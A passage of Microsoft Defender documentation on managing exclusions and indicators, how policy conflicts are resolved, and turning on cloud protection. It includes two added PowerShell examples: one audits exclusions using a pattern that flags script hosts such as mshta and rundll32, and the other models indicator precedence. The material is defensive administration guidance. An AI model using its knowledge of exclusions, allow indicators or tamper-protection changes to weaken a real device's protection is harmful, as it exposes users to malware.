How end users interact with the client on individual endpoints. See the following
resources:
Prevent users from seeing or interacting with the Microsoft Defender Antivirus
user interface
Prevent or allow users to locally modify Microsoft Defender Antivirus policy
settings

Tip

Review Reference topics for management and configuration tools. If you're looking
for antivirus-related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

Tip

Performance tip: Due to a variety of factors (examples listed below), Microsoft
Defender Antivirus, like other antivirus software, can cause performance issues on
endpoint devices. In some cases, you might need to tune the performance of Microsoft
Defender Antivirus to alleviate those performance issues. Microsoft's Performance
analyzer is a PowerShell command-line tool that helps determine which files, file
paths, processes, and file extensions might be causing performance issues; some
examples are:

Top paths that impact scan time
Top files that impact scan time
Top processes that impact scan time
Top file extensions that impact scan time
Combinations – for example:
  top files per extension
  top paths per extension
  top processes per path
  top scans per file
  top scans per file per process

You can use the information gathered using Performance analyzer to better assess
performance issues and apply remediation actions. See: Performance analyzer for
Microsoft Defender Antivirus.

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Manage exclusions for Microsoft
Defender for Endpoint and Microsoft
Defender Antivirus
Article • 08/07/2023

Applies to:

Microsoft Defender Antivirus
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Platforms

Windows

Note

As a Microsoft MVP, Fabian Bader contributed to and provided material feedback for
this article.

Microsoft Defender for Endpoint includes a wide range of capabilities to prevent, detect,
investigate, and respond to advanced cyberthreats. These capabilities include Next-
generation protection (which includes Microsoft Defender Antivirus). As with any
endpoint protection or antivirus solution, sometimes files, folders, or processes that
aren't actually a threat can be detected as malicious by Defender for Endpoint or
Microsoft Defender Antivirus. These entities can be blocked or sent to quarantine, even
though they're not really a threat.

You can take certain actions to prevent false positives and similar issues from occurring.
These actions include:

Submitting a file to Microsoft for analysis
Suppressing an alert
Adding an exclusion or indicator

This article explains how these actions work, and describes the various types of
exclusions that can be defined for Defender for Endpoint and Microsoft Defender
Antivirus.

Caution

Defining exclusions reduces the level of protection offered by Defender for
Endpoint and Microsoft Defender Antivirus. Use exclusions as a last resort, and
make sure to define only the exclusions that are necessary. Make sure to review
your exclusions periodically, and remove the ones you no longer need. See
Important points about exclusions and Common mistakes to avoid.

Submissions, suppressions, and exclusions

When you're dealing with false positives, or known entities that are generating alerts,
you don't necessarily need to add an exclusion. Sometimes classifying and suppressing
an alert is enough. We recommend submitting false positives (and false negatives) to
Microsoft for analysis as well. The following table describes some scenarios and what
steps to take with respect to file submissions, alert suppressions, and exclusions.

Scenario: False positive. An entity, such as a file or a process, was detected and
identified as malicious, even though the entity isn't a threat.
Steps to consider:
1. Review and classify alerts that were generated as a result of the detected entity.
2. Suppress an alert for a known entity.
3. Review remediation actions that were taken for the detected entity.
4. Submit the false positive to Microsoft for analysis.
5. Define an exclusion for the entity (only if necessary).

Scenario: Performance issues, such as one of the following:
- A system is having high CPU usage or other performance issues.
- A system is having memory leak issues.
- An app is slow to load on devices.
- An app is slow to open a file on devices.
Steps to consider:
1. Collect diagnostic data for Microsoft Defender Antivirus.
2. If you're using a non-Microsoft antivirus solution, check with the vendor for any
needed exclusions.
3. Analyze the Microsoft Protection Log to see the estimated performance impact.
4. Define an exclusion for Microsoft Defender Antivirus (if necessary).
5. Create an indicator for Defender for Endpoint (only if necessary).

Scenario: Compatibility issues with non-Microsoft antivirus products. Example:
Defender for Endpoint relies on security intelligence updates for devices, whether
they're running Microsoft Defender Antivirus or a non-Microsoft antivirus solution.
Steps to consider:
1. If you're using a non-Microsoft antivirus product as your primary
antivirus/antimalware solution, set Microsoft Defender Antivirus to passive mode.
2. If you're switching from a non-Microsoft antivirus/antimalware solution to Defender
for Endpoint, see Make the switch to Defender for Endpoint. This guidance includes:
- Exclusions you might need to define for the non-Microsoft antivirus/antimalware
solution;
- Exclusions you might need to define for Microsoft Defender Antivirus; and
- Troubleshooting information (just in case something goes wrong while migrating).

Important

An "allow" indicator is the strongest type of exclusion you can define in Defender
for Endpoint. Make sure to use indicators sparingly (only when necessary), and
review all exclusions periodically.

Submitting files for analysis

If you have a file that you think is wrongly detected as malware (a false positive), or a file
that you suspect might be malware even though it wasn't detected (a false negative),
you can submit the file to Microsoft for analysis. Your submission is scanned
immediately, and will then be reviewed by Microsoft security analysts. You're able to
check the status of your submission on the submission history page.

Submitting files for analysis helps reduce false positives and false negatives for all
customers. To learn more, see the following articles:

Submit files for analysis (available to all customers)
Submit files using the new unified submissions portal in Defender for Endpoint
(available to customers who have Defender for Endpoint Plan 2 or Microsoft
Defender XDR)

Suppressing alerts
If you're getting alerts in the Microsoft Defender portal for tools or processes that you
know aren't actually a threat, you can suppress those alerts. To suppress an alert, you
create a suppression rule, and specify what actions to take for that on other, identical
alerts. You can create suppression rules for a specific alert on a single device, or for all
alerts that have the same title across your organization.

To learn more, see the following articles:

Suppress alerts
Introducing the new alert suppression experience (for Defender for Endpoint)

Exclusions and indicators

Sometimes, the term exclusions is used to refer to exceptions that apply across Defender
for Endpoint and Microsoft Defender Antivirus. A more accurate way to describe these
exceptions is as follows:

Indicators for Defender for Endpoint (which apply across Defender for Endpoint and
Microsoft Defender Antivirus); and
Exclusions for Microsoft Defender Antivirus.

The following table summarizes exclusion types that can be defined for Defender for
Endpoint and Microsoft Defender Antivirus.

Tip

Defender for Endpoint Plan 1 is available as a standalone plan, and is included in
Microsoft 365 E3.
Defender for Endpoint Plan 2 is available as a standalone plan, and is included in
Microsoft 365 E5.
If you have Microsoft 365 E3 or E5, make sure to set up your Defender for Endpoint
capabilities.

Product/service: Microsoft Defender Antivirus; Defender for Endpoint Plan 1 or Plan 2
Exclusion types:
- Automatic exclusions (for active roles on Windows Server 2016 and later)
- Built-in exclusions (for operating system files in Windows)
- Custom exclusions, such as process-based exclusions, folder location-based
exclusions, file extension exclusions, or contextual file and folder exclusions
- Custom remediation actions based on threat severity or for specific threats
The standalone versions of Defender for Endpoint Plan 1 and Plan 2 don't include
server licenses. To onboard servers, you need another license, such as Microsoft
Defender for Endpoint for Servers or Microsoft Defender for Servers Plan 1 or 2. To
learn more, see Defender for Endpoint onboarding Windows Server. If you're a small or
medium-sized business using Microsoft Defender for Business, you can get Microsoft
Defender for Business servers.

Product/service: Defender for Endpoint Plan 1 or Plan 2
Exclusion types:
- Indicators for files, certificates, or IP addresses, URLs/domains
- Attack surface reduction exclusions
- Controlled folder access exclusions

Product/service: Defender for Endpoint Plan 2
Exclusion types:
- Automation folder exclusions (for automated investigation and remediation)

The following sections describe these exclusions in more detail:

Microsoft Defender Antivirus exclusions
Defender for Endpoint indicators
Attack surface reduction exclusions
Controlled folder access exclusions
Automation folder exclusions (for automated investigation and remediation)

Microsoft Defender Antivirus exclusions

Microsoft Defender Antivirus exclusions can apply to antivirus scans and/or to real-time
protection. These exclusions include:

Automatic exclusions (for server roles on Windows Server 2016 and later)
Built-in exclusions (for operating system files in all versions of Windows)
Custom exclusions (for files and folders that you specify, if necessary)
Custom remediation actions (to determine what happens with detected threats)

Automatic exclusions
Automatic exclusions (also referred to as automatic server role exclusions) include
exclusions for server roles and features in Windows Server. These exclusions aren't
scanned by real-time protection but are still subject to quick, full, or on-demand
antivirus scans.

Examples include:

File Replication Service (FRS)
Hyper-V
SYSVOL
Active Directory
DNS Server
Print Server
Web Server
Windows Server Update Services
...and more.

Note

Automatic exclusions for server roles aren't supported on Windows Server 2012 R2.
For servers running Windows Server 2012 R2 with the Active Directory Domain
Services (AD DS) server role installed, exclusions for domain controllers must be
specified manually. See Active Directory exclusions.

For more information, see Automatic server role exclusions.

Built-in exclusions
Built-in exclusions include certain operating system files that are excluded by Microsoft
Defender Antivirus on all versions of Windows (including Windows 10, Windows 11, and
Windows Server).

Examples include:

%windir%\SoftwareDistribution\Datastore\*\Datastore.edb
%allusersprofile%\NTUser.pol
Windows Update files
Windows Security files
... and more.

The list of built-in exclusions in Windows is kept up to date as the threat landscape
changes. To learn more about these exclusions, see Microsoft Defender Antivirus
exclusions on Windows Server: Built-in exclusions.

Custom exclusions
Custom exclusions include files and folders that you specify. Exclusions for files, folders,
and processes will be skipped by scheduled scans, on-demand scans, and real-time
protection. Exclusions for process-opened files won't be scanned by real-time protection
but are still subject to quick, full, or on-demand antivirus scans.

Custom remediation actions

When Microsoft Defender Antivirus detects a potential threat while running a scan, it
attempts to remediate or remove the detected threat. You can define custom
remediation actions to configure how Microsoft Defender Antivirus should address
certain threats, whether a restore point should be created before remediating, and when
threats should be removed. Configure remediation actions for Microsoft Defender
Antivirus detections.

Defender for Endpoint indicators

You can define indicators with specific actions for entities, such as files, IP addresses,
URLs/domains, and certificates. In Defender for Endpoint, indicators are referred to as
Indicators of Compromise (IoCs), and less often, as custom indicators. When you define
your indicators, you can specify one of the following actions:

Allow – Defender for Endpoint won't block files, IP addresses, URLs/domains, or
certificates that have Allow indicators. (Use this action with caution.)

Audit – Files, IP addresses, and URLs/domains with Audit indicators are monitored,
and when they're accessed by users, informational alerts are generated in the
Microsoft Defender portal.

Block and Remediate – Files or certificates with Block and Remediate indicators are
blocked and quarantined when detected.

Block Execution – IP addresses and URLs/domains with Block Execution indicators are
blocked. Users can't access those locations.

Warn – IP addresses and URLs/domains with Warn indicators cause a warning message
to be displayed when a user attempts to access those locations. Users can choose to
bypass the warning and proceed to the IP address or URL/domain.

Important

You can have up to 15,000 indicators in your tenant.

The following table summarizes IoC types and available actions:

Indicator type: Files
Available actions: Allow, Audit, Warn, Block execution, Block and remediate

Indicator type: IP addresses and URLs/domains
Available actions: Allow, Audit, Warn, Block execution

Indicator type: Certificates
Available actions: Allow, Block and remediate

Tip

See the following resources to learn more about indicators:

Create indicators
Create indicators for files
Create indicators for IP addresses and URLs/domains
Create indicators based on certificates
Manage indicators

Attack surface reduction exclusions

Attack surface reduction rules (also known as ASR rules) target certain software
behaviors, such as:

Launching executable files and scripts that attempt to download or run files
Running scripts that seem to be obfuscated or otherwise suspicious
Performing behaviors that apps don't usually initiate during normal day-to-day
work

Sometimes, legitimate applications exhibit software behaviors that could be blocked by
attack surface reduction rules. If that's occurring in your organization, you can define
exclusions for certain files and folders. Such exclusions are applied to all attack surface
reduction rules. See Enable attack surface reduction rules.

Also note that while most ASR rule exclusions are independent from Microsoft
Defender Antivirus exclusions, some ASR rules do honor some Microsoft Defender
Antivirus exclusions. See Attack surface reduction rules reference - Microsoft Defender
Antivirus exclusions and ASR rules.

Controlled folder access exclusions
Controlled folder access monitors apps for activities that are detected as malicious and
protects the contents of certain (protected) folders on Windows devices. Controlled
folder access allows only trusted apps to access protected folders, such as common
system folders (including boot sectors) and other folders that you specify. You can allow
certain apps or signed executables to access protected folders by defining exclusions.
See Customize controlled folder access.

Automation folder exclusions

Automation folder exclusions apply to automated investigation and remediation in
Defender for Endpoint, which is designed to examine alerts and take immediate action
to resolve detected breaches. As alerts are triggered, and an automated investigation
runs, a verdict (Malicious, Suspicious, or No threats found) is reached for each piece of
evidence investigated. Depending on the automation level and other security settings,
remediation actions can occur automatically or only upon approval by your security
operations team.

You can specify folders, file extensions in a specific directory, and file names to be
excluded from automated investigation and remediation capabilities. Such automation
folder exclusions apply to all devices onboarded to Defender for Endpoint. These
exclusions are still subject to antivirus scans. See Manage automation folder exclusions.
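The exclusion types described in the sections above (custom exclusions, custom remediation actions, attack surface reduction exclusions, controlled folder access exclusions) are exactly what the Caution at the top of this article asks you to review periodically. The following is an added example, not code from the article, that reads those settings from one device with the Defender module's Get-MpPreference and flags the broad ones; the "broad exclusion" rules are the example's own judgement, and indicators and automation folder exclusions (tenant-side portal settings) are out of its reach.

```powershell
# Added example, not code from the Microsoft article. Lists the exclusion-type
# settings described above that live in a device's Defender Antivirus preferences
# (custom exclusions, ASR-only exclusions, controlled folder access allowed apps,
# automatic exclusions, custom remediation actions) and flags broad ones for review.
# Uses the Defender module's Get-MpPreference; run elevated. Indicators and
# automation folder exclusions are tenant-side portal settings and aren't shown.
# The "broad exclusion" rules are this example's own, not a product check.

function Test-BroadExclusion {
    param([string] $Value)
    # Returns a short finding for exclusions that cover far more than one necessary
    # file, folder or process, or an empty string when nothing stands out.
    if ($Value -match '^[A-Za-z]:\\?$')                          { return 'entire drive excluded' }
    if ($Value -eq '*' -or $Value -eq '*.*')                     { return 'matches everything' }
    if ($Value -match '\\\*\\?$')                                { return 'wildcard folder' }
    if ($Value -match '(?i)\\(Temp|Downloads|AppData)(\\|$)')    { return 'user-writable location' }
    if ($Value -match '(?i)^\.?(exe|dll|ps1|bat|cmd|js|vbs)$')   { return 'executable file extension' }
    if ($Value -match '(?i)(^|\\)(powershell|pwsh|cmd|wscript|cscript|rundll32|mshta)\.exe$') {
        return 'files opened by a script host are unscanned'
    }
    return ''
}

function Get-DefenderExclusionReport {
    [CmdletBinding()]
    param()
    $p = Get-MpPreference

    # Each key names an exclusion type from the article; each value is the
    # preference that holds it on this device.
    $sections = [ordered]@{
        'Custom exclusion: path'                = $p.ExclusionPath
        'Custom exclusion: extension'           = $p.ExclusionExtension
        'Custom exclusion: process'             = $p.ExclusionProcess
        'Attack surface reduction exclusion'    = $p.AttackSurfaceReductionOnlyExclusions
        'Controlled folder access: allowed app' = $p.ControlledFolderAccessAllowedApplications
    }

    $report = @(
        foreach ($name in $sections.Keys) {
            foreach ($item in @($sections[$name] | Where-Object { $_ })) {
                [pscustomobject]@{
                    Section = $name
                    Value   = $item
                    Finding = Test-BroadExclusion -Value $item
                }
            }
        }
    )

    # Automatic server role exclusions are on unless explicitly disabled; if they are
    # off, server roles need manually defined exclusions.
    $report += [pscustomobject]@{
        Section = 'Automatic exclusions'
        Value   = $(if ($p.DisableAutoExclusions) { 'disabled' } else { 'enabled' })
        Finding = $(if ($p.DisableAutoExclusions) { 'server roles need manual exclusions' } else { '' })
    }

    # Custom remediation actions for specific threat IDs. In the Set-MpPreference
    # ThreatAction enumeration the value 6 is Allow, which is the one to scrutinise.
    $ids  = @($p.ThreatIDDefaultAction_Ids)
    $acts = @($p.ThreatIDDefaultAction_Actions)
    for ($i = 0; $i -lt $ids.Count; $i++) {
        $report += [pscustomobject]@{
            Section = 'Custom remediation action'
            Value   = "ThreatID $($ids[$i]) -> action $($acts[$i])"
            Finding = $(if ([int]$acts[$i] -eq 6) { 'threat explicitly allowed' } else { '' })
        }
    }
    return $report
}

# Usage: show only the entries worth a second look during a periodic review
# Get-DefenderExclusionReport | Where-Object Finding | Format-Table -AutoSize
```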

How exclusions and indicators are evaluated

Most organizations have several different types of exclusions and indicators to
determine whether users should be able to access and use a file or process. Exclusions
and indicators are processed in a particular order so that policy conflicts are handled
systematically.

The following image summarizes how exclusions and indicators are handled across
Defender for Endpoint and Microsoft Defender Antivirus:

Here's how it works:

1. If a detected file/process isn't allowed by Windows Defender Application Control
and AppLocker, it's blocked. Otherwise, it proceeds to Microsoft Defender Antivirus.

2. If the detected file/process isn't part of an exclusion for Microsoft Defender
Antivirus, it's blocked. Otherwise, Defender for Endpoint checks for a custom
indicator for the file/process.

3. If the detected file/process has a Block or Warn indicator, that action is taken.
Otherwise, the file/process is allowed, and proceeds to evaluation by attack surface
reduction rules, controlled folder access, and SmartScreen protection.

4. If the detected file/process isn't blocked by attack surface reduction rules,
controlled folder access, or SmartScreen protection, it proceeds to Microsoft
Defender Antivirus.

5. If the detected file/process isn't allowed by Microsoft Defender Antivirus, it's
checked for an action based on its threat ID.

How policy conflicts are handled

In cases where Defender for Endpoint indicators conflict, here's what to expect:

If there are conflicting file indicators, the indicator that uses the most secure hash
is applied. For example, SHA256 takes precedence over SHA-1, which takes
precedence over MD5.

If there are conflicting URL indicators, the more strict indicator is used. For
Microsoft Defender SmartScreen, an indicator that uses the longest URL path is
applied. For example, www.dom.ain/admin/ takes precedence over www.dom.ain.
(Network protection applies to domains, rather than subpages within a domain.)

If there are similar indicators for a file or process that have different actions, the
indicator that is scoped to a specific device group takes precedence over an
indicator that targets all devices.
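To predict which of several overlapping indicators will take effect, the three rules above can be written down as a small model. The following is an added example, not code from the article: the indicator objects and hash values are constructed placeholders, and because the article states the rules separately, the order in which the model combines them (device-group scope first, then hash strength or URL path length) is the example's own assumption rather than documented product behaviour.

```powershell
# Added example, not code from the Microsoft article: a small model of the conflict
# rules listed above, so you can predict which of several overlapping indicators
# takes effect. The indicator objects and sample values are constructed for this
# example. The article states the rules separately; the way they are combined here
# (device-group scope first, then hash strength or URL path length) is this
# example's assumption, not documented product behaviour.

function Resolve-IndicatorConflict {
    param([Parameter(Mandatory)] [object[]] $Indicators)

    # Rule: among conflicting file indicators the most secure hash wins
    # (SHA256 over SHA-1, SHA-1 over MD5).
    $hashRank = @{ 'SHA256' = 3; 'SHA1' = 2; 'MD5' = 1 }

    $scored = foreach ($ind in $Indicators) {
        $specificity = switch ($ind.Type) {
            'File' { $hashRank[$ind.HashType] }
            # Rule: among conflicting URL indicators (SmartScreen) the longest URL
            # path wins, e.g. www.dom.ain/admin/ over www.dom.ain.
            'Url'  { ([uri]"https://$($ind.Value)").AbsolutePath.TrimEnd('/').Length }
        }
        [pscustomobject]@{
            Indicator   = $ind
            # Rule: an indicator scoped to a device group beats one for all devices.
            ScopeRank   = $(if ($ind.Scope -eq 'AllDevices') { 0 } else { 1 })
            Specificity = $specificity
        }
    }

    ($scored | Sort-Object ScopeRank, Specificity -Descending | Select-Object -First 1).Indicator
}

# Constructed sample: one file known by three hashes, each with a different action,
# so the hash-strength rule decides. Hash values are placeholders, not real indicators.
$fileIndicators = @(
    [pscustomobject]@{ Type = 'File'; HashType = 'MD5';    Value = '<md5-placeholder>';    Action = 'Allow';              Scope = 'AllDevices' }
    [pscustomobject]@{ Type = 'File'; HashType = 'SHA1';   Value = '<sha1-placeholder>';   Action = 'Warn';               Scope = 'AllDevices' }
    [pscustomobject]@{ Type = 'File'; HashType = 'SHA256'; Value = '<sha256-placeholder>'; Action = 'Block and remediate'; Scope = 'AllDevices' }
)
(Resolve-IndicatorConflict $fileIndicators).Action

# The article's own URL example: the path-length rule decides.
$urlIndicators = @(
    [pscustomobject]@{ Type = 'Url'; Value = 'www.dom.ain';        Action = 'Allow';           Scope = 'AllDevices' }
    [pscustomobject]@{ Type = 'Url'; Value = 'www.dom.ain/admin/'; Action = 'Block execution'; Scope = 'AllDevices' }
)
(Resolve-IndicatorConflict $urlIndicators).Action

# Same hash, different actions, one of them scoped to a device group: the scope
# rule decides. The group name is a constructed example.
$scopedFile = @(
    [pscustomobject]@{ Type = 'File'; HashType = 'SHA256'; Value = '<sha256-placeholder>'; Action = 'Allow';               Scope = 'AllDevices' }
    [pscustomobject]@{ Type = 'File'; HashType = 'SHA256'; Value = '<sha256-placeholder>'; Action = 'Block and remediate'; Scope = 'Finance workstations' }
)
(Resolve-IndicatorConflict $scopedFile).Action
```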

How automated investigation and remediation works with indicators

Automated investigation and remediation capabilities in Defender for Endpoint first
determine a verdict for each piece of evidence, and then take an action depending on
Defender for Endpoint indicators. Thus, a file/process could get a verdict of "good"
(which means no threats were found) and still be blocked if there's an indicator with that
action. Similarly, an entity could get a verdict of "bad" (which means it's determined to
be malicious) and still be allowed if there's an indicator with that action.

The following diagram shows how automated investigation and remediation works with
indicators:

Other server workloads and exclusions

If your organization is using other server workloads, such as Exchange Server, SharePoint
Server, or SQL Server, be aware that only built-in server roles (that could be
prerequisites for software you install later) on Windows Server are excluded by the
automatic exclusions feature (and only when using their default installation location).
You'll likely need to define antivirus exclusions for these other workloads, or for all
workloads if you disable automatic exclusions.

Here are some examples of technical documentation to identify and implement the
exclusions you need:

Running antivirus software on Exchange Server
Folders to exclude from antivirus scans on SharePoint Server
Choosing antivirus software for SQL Server

Depending on what you're using, you might need to refer to the documentation for that
server workload.

Tip

Performance tip: Due to a variety of factors, Microsoft Defender Antivirus, like other
antivirus software, can cause performance issues on endpoint devices. In some
cases, you might need to tune the performance of Microsoft Defender Antivirus to
alleviate those performance issues. Microsoft's Performance analyzer is a
PowerShell command-line tool that helps determine which files, file paths,
processes, and file extensions might be causing performance issues; some
examples are:

Top paths that impact scan time
Top files that impact scan time
Top processes that impact scan time
Top file extensions that impact scan time
Combinations, such as:
  top files per extension
  top paths per extension
  top processes per path
  top scans per file
  top scans per file per process

You can use the information gathered using Performance analyzer to better assess
performance issues and apply remediation actions. See: Performance analyzer for
Microsoft Defender Antivirus.

See also
Important points about exclusions
Common mistakes to avoid when defining exclusions
Blog post: The Hitchhiker's Guide to Microsoft Defender for Endpoint exclusions

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Cloud protection and Microsoft
Defender Antivirus
Article • 11/06/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business
Microsoft Defender for Individuals
Microsoft Defender Antivirus

Platforms

Windows

Next-generation technologies in Microsoft Defender Antivirus provide near-instant,
automated protection against new and emerging threats. To identify new threats
dynamically, next-generation technologies work with large sets of interconnected data
in the Microsoft Intelligent Security Graph and powerful artificial intelligence (AI)
systems driven by advanced machine learning models. Cloud protection works together
with Microsoft Defender Antivirus to deliver accurate, real-time, and intelligent
protection.

 Tip

We recommend keeping cloud protection turned on. To learn more, see Why cloud
protection should be turned on.

How cloud protection works


Microsoft Defender Antivirus works seamlessly with Microsoft cloud services. These
cloud protection services, also referred to as Microsoft Advanced Protection Service
(MAPS), enhance standard real-time protection. With cloud protection, next-generation
technologies provide rapid identification of new threats, sometimes even before a single
endpoint is infected.

The following blog posts illustrate how cloud protection works:

Get to know the advanced technologies at the core of Microsoft Defender for Endpoint next-generation protection
Why Microsoft Defender Antivirus is the most deployed in the enterprise
Behavior monitoring combined with machine learning spoils a massive coin-mining campaign
How artificial intelligence stopped an "Emotet" outbreak
Detonating a bad rabbit: Microsoft Defender Antivirus and layered machine learning defenses
Microsoft Defender Antivirus cloud protection service: Advanced real-time defense against never-before-seen malware

Note

The Microsoft Defender Antivirus cloud service is a mechanism for delivering
updated protection to your network and endpoints. As a cloud service, it is not
simply protection for files stored in the cloud; instead, the cloud service uses
distributed resources and machine learning to deliver protection to your endpoints
at a rate that is far faster than traditional security intelligence updates.

How to get cloud protection


Cloud protection is enabled by default. However, you might need to re-enable it if it has
been disabled as part of previous organizational policies. To learn more, see Turn on
cloud protection.

If your subscription includes Windows 10 E5, you can take advantage of emergency
dynamic intelligence updates, which provide near real-time protection from emerging
threats. When you turn on cloud protection, fixes for malware issues can be delivered via
the cloud within minutes, instead of waiting for the next update. See Configure
Microsoft Defender Antivirus to automatically receive new protection updates based on
reports from our cloud service.

Turn on cloud protection in Microsoft
Defender Antivirus
Article • 05/24/2023

Applies to:

Microsoft Defender Antivirus
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Platforms

Windows

Cloud protection in Microsoft Defender Antivirus delivers accurate, real-time, and
intelligent protection. Cloud protection is enabled by default.

Note

Tamper protection helps keep cloud protection and other security settings from
being changed. As a result, when tamper protection is enabled, any changes made
to tamper-protected settings are ignored. If you must make changes to a device
and those changes are blocked by tamper protection, we recommend using
troubleshooting mode to temporarily disable tamper protection on the device.
Note that after troubleshooting mode ends, any changes made to tamper-
protected settings are reverted to their configured state.

Why cloud protection should be turned on


Microsoft Defender Antivirus cloud protection helps protect against malware on your
endpoints and across your network. We recommend keeping cloud protection turned
on, because certain security features and capabilities in Microsoft Defender for Endpoint
only work when cloud protection is enabled.
The following table summarizes the features and capabilities that depend on cloud
protection:

Feature/Capability: Checking against metadata in the cloud
Subscription requirement: Microsoft Defender for Endpoint Plan 1 or Plan 2 (standalone or included in a plan like Microsoft 365 E3 or E5)
Description: The Microsoft Defender Antivirus cloud service uses machine learning models as an extra layer of defense. These machine learning models include metadata, so when a suspicious or malicious file is detected, its metadata is checked. To learn more, see Blog: Get to know the advanced technologies at the core of Microsoft Defender for Endpoint next-generation protection.

Feature/Capability: Cloud protection and sample submission
Subscription requirement: Microsoft Defender for Endpoint Plan 1 or Plan 2 (standalone or included in a plan like Microsoft 365 E3 or E5)
Description: Files and executables can be sent to the Microsoft Defender Antivirus cloud service for detonation and analysis. Automatic sample submission relies on cloud protection, although it can also be configured as a standalone setting. To learn more, see Cloud protection and sample submission in Microsoft Defender Antivirus.

Feature/Capability: Tamper protection
Subscription requirement: Microsoft Defender for Endpoint Plan 2 (standalone or included in a plan like Microsoft 365 E5)
Description: Tamper protection helps protect against unwanted changes to your organization's security settings. To learn more, see Protect security settings with tamper protection.

Feature/Capability: Block at first sight
Subscription requirement: Microsoft Defender for Endpoint Plan 1 or Plan 2 (standalone or included in a plan like Microsoft 365 E3 or E5)
Description: Block at first sight detects new malware and blocks it within seconds. When a suspicious or malicious file is detected, block at first sight queries the cloud protection backend and applies heuristics, machine learning, and automated analysis of the file to determine whether it is a threat. To learn more, see What is "block at first sight"?

Feature/Capability: Emergency signature updates
Subscription requirement: Microsoft Defender for Endpoint Plan 2 (standalone or included in a plan like Microsoft 365 E5)
Description: When malicious content is detected, emergency signature updates and fixes are deployed. Rather than wait for the next regular update, you can receive these fixes and updates within minutes. To learn more about updates, see Microsoft Defender Antivirus security intelligence and product updates.

Feature/Capability: Endpoint detection and response (EDR) in block mode
Subscription requirement: Microsoft Defender for Endpoint Plan 2 (standalone or included in a plan like Microsoft 365 E5)
Description: EDR in block mode provides extra protection when Microsoft Defender Antivirus isn't the primary antivirus product on a device. EDR in block mode remediates artifacts found during EDR-generated scans that the non-Microsoft, primary antivirus solution might have missed. When enabled for devices with Microsoft Defender Antivirus as the primary antivirus solution, EDR in block mode provides the added benefit of automatically remediating artifacts identified during EDR-generated scans. To learn more, see EDR in block mode.

Feature/Capability: Attack surface reduction rules
Subscription requirement: Microsoft Defender for Endpoint Plan 1 or Plan 2 (standalone or included in a plan like Microsoft 365 E3 or E5)
Description: ASR rules are intelligent rules that you can configure to help stop malware. Certain rules require cloud protection to be turned on in order to function fully. These rules include:
- Block executable files from running unless they meet a prevalence, age, or trusted list criteria
- Use advanced protection against ransomware
- Block untrusted programs from running from removable drives
To learn more, see Use attack surface reduction rules to prevent malware infection.

Feature/Capability: Indicators of compromise (IoCs)
Subscription requirement: Microsoft Defender for Endpoint Plan 2 (standalone or included in a plan like Microsoft 365 E5)
Description: In Defender for Endpoint, IoCs can be configured to define the detection, prevention, and exclusion of entities. Examples:
- "Allow" indicators can be used to define exceptions to antivirus scans and remediation actions.
- "Alert and block" indicators can be used to prevent files or processes from executing.
To learn more, see Create indicators.

Methods to configure cloud protection

You can turn Microsoft Defender Antivirus cloud protection on or off by using one of
several methods, such as:

Microsoft Intune
Group Policy
PowerShell cmdlets
Windows Management Instrumentation (WMI)

You can also use Configuration Manager, and you can turn cloud protection on or off
on individual endpoints by using the Windows Security app.

For more information about the specific network-connectivity requirements to ensure
your endpoints can connect to the cloud protection service, see Configure and validate
network connections.

Note

In Windows 10 and Windows 11, there is no difference between the Basic and
Advanced reporting options described in this article. This is a legacy distinction, and
choosing either setting results in the same level of cloud protection. There is no
difference in the type or amount of information that is shared. For more
information on what we collect, see the Microsoft Privacy Statement.

Use Microsoft Intune to turn on cloud protection

1. Go to the Intune admin center (https://intune.microsoft.com) and sign in.

2. Choose Endpoint security > Antivirus.

3. In the AV policies section, either select an existing policy, or choose + Create Policy.

To create a new policy:

   1. For Platform, select Windows 10, Windows 11, and Windows Server.
   2. For Profile, select Microsoft Defender Antivirus.
   3. On the Basics page, specify a name and description for the policy, and then choose Next.
   4. In the Defender section, find Allow Cloud Protection, and set it to Allowed. Then choose Next.
   5. Scroll down to Submit Samples Consent, and select one of the following settings:
      - Send all samples automatically
      - Send safe samples automatically
   6. On the Scope tags step, if your organization is using scope tags, select the tags you want to use, and then choose Next.
   7. On the Assignments step, select the groups, users, or devices that you want to apply this policy to, and then choose Next.
   8. On the Review + create step, review the settings for your policy, and then choose Create.

To edit an existing policy:

   1. Select the policy that you want to edit.
   2. Under Configuration settings, choose Edit.
   3. In the Defender section, find Allow Cloud Protection, and set it to Allowed.
   4. Scroll down to Submit Samples Consent, and select one of the following settings:
      - Send all samples automatically
      - Send safe samples automatically
   5. Select Review + save.

 Tip

To learn more about Microsoft Defender Antivirus settings in Intune, see Antivirus
policy for endpoint security in Intune.

Use Group Policy to turn on cloud protection


1. On your Group Policy management device, open the Group Policy Management
Console, right-click the Group Policy Object you want to configure and select Edit.

2. In the Group Policy Management Editor, go to Computer configuration.

3. Select Administrative templates.

4. Expand the tree to Windows components > Microsoft Defender Antivirus > MAPS.

Note

MAPS settings are equal to cloud-delivered protection.

5. Double-click Join Microsoft MAPS. Ensure the option is turned on and set to Basic
MAPS or Advanced MAPS. Select OK.

You can choose to send basic or additional information about detected software:
Basic MAPS: Basic membership sends basic information to Microsoft about
malware and potentially unwanted software that has been detected on your
device. Information includes where the software came from (like URLs and
partial paths), the actions taken to resolve the threat, and whether the actions
were successful.

Advanced MAPS: In addition to basic information, advanced membership


sends detailed information about malware and potentially unwanted
software, including the full path to the software, and detailed information
about how the software has affected your device.

6. Double-click Send file samples when further analysis is required. Ensure that the
first option is set to Enabled and that the other options are set to either:

Send safe samples (1)
Send all samples (3)

Note

The Send safe samples (1) option means that most samples are sent
automatically. Files that are likely to contain personal information prompt the
user for additional confirmation. Setting the option to Always Prompt (0)
lowers the protection state of the device. Setting it to Never send (2) means
that the Block at First Sight feature of Microsoft Defender for Endpoint won't
work.

7. Select OK.

Use PowerShell cmdlets to turn on cloud protection

The following cmdlets can turn on cloud protection:

PowerShell

